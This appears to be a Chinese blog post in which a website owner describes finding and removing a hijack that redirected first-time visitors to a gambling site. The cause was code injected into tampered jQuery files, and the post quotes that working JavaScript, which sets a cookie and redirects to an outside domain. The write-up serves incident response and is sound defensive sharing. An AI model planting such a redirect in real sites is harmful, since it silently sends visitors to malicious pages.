这几天，服务器被攻击了（后续，已解决）

上周困扰我的官网被攻击的事情，今天终于解决啦，现在我分享一下继上篇文章之后，我做了哪些事情。
上篇文章简书链接：点我

一、发现

上次使用D盾工具，查杀了大部分后门程序和感染文件。
而且还在阿里云上做了端口域名限制。
之后我打开官网访问就正常了。
但是，让其他人试试，却还是跳转到博cai网站。
很纳闷~
我试着清理浏览器缓存，然后再访问，果然也跳了博cai网站。

二、分析

针对当前状况，我分析出以下几点：

• 只有$首次$访问官网才会跳链，跳链脚本可能通过cookie、session来判断；
• 重新用d盾查杀，没有找到可疑文件，并且网站这几天出现问题都是上面这种首次跳转的，说明外部攻击和内部传播已经防御成功，接下来解决好一些残留的木马脚本应该就没啥问题了；
• 直接在首页跳转，应该跟官网首页有关，可以查查首页的页面和相关js文件；

三、排查

1. cookie查看

没看出个啥。

2. 页面检查

看了半天，没发现啥异常。

3. 引入js文件

在页面中看到，首页引入了如图js。

我把后面三个js删掉，然后清除缓存数据，再访问官网，发现还是会跳链。
我想，莫非jquary的有问题？
我把之前三个恢复，这次把引入的jquary删了，再次访问。
访问正常，没有跳链了，仅仅只是网页一些效果没有。
ok，能确定是这个jquary文件被动过手脚了。
打开一看，果然。

好家伙！居然首尾都给插了这段代码！
下面我对这段代码注释一下，然后大家就都明白了。

var c = document.cookie;
     if (c.indexOf('isfirstvisited=false') != -1) {//访问过，不做任何操作
        
     }
     else {
         var d = new Date();
         d.setFullYear(d.getFullYear() + 1);//cookie有效期1年
         document.cookie = 'isfirstvisited=false;expires=' + d.toGMTString();
         location = 'https://sdfhu1.com/248486.html'//这个网站最终就是跳到那个博cai网站
     }

直接删除这两段代码，官网就正常访问了。
然后我去到其他项目的js文件夹中，排查了所有js，发现还有几个jquary也被修改了，修改完，都能正常访问了。

至此，困扰几天的服务器被攻击事件，在依靠他人智慧和自己分析下，终于解决了。

四、总结

稍微总结一下：

1. 平时多注意，该做的防护工作不能嫌麻烦；
2. 木马文件等善于伪装，检查时候应当全面；
3. 遇到服务器被攻击不要慌张，细心分析查找，总能解决的；

好了，文章到这里结束了，感谢阅读，也希望这次经历能对遇到同样困扰的朋友有所帮助。